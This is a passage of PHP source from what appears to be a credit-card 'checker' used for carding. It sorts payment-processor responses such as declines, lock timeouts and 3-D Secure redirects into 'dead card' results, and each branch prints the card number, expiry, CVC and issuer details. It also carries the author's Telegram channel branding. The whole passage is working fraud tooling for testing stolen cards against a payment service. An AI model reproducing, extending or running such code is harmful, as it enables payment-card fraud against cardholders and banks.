badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"lock_timeout")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Lock Timeout </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'Your card does not support this type of purchase.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card does not support this type of purchase </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"transaction_not_allowed")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Transaction Not Allowed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"three_d_secure_redirect")){
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Three D Secure Redirect </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Card is declined by your bank, please contact them for additional information.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Card is declined by your bank, please contact them for additional information </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"missing_payment_information")){
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Missing Payment Information </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "Payment cannot be processed, missing credit card number")) {
     echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Payment cannot be processed, missing credit card number </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
else {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Error Not Listed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ★𝙏𝙊𝙉𝘼𝙈𝙄★</span></br><span class="badge badge-yellow">Telegram Username = @Tonami_YT</span></br><span class="badge badge-yellow">Channel Link = @KurdishAccounts</span></br><span class="badge badge-yellow">Group link = </span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/Tonami2410</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
curl_close($ch);
ob_flush();
/////////////////////// 1req Raw Made By★𝙏𝙊𝙉𝘼𝙈𝙄★】///////////////////////////////////
////////////////////// Join @KurdishAccounts//////////////////////////////////
?>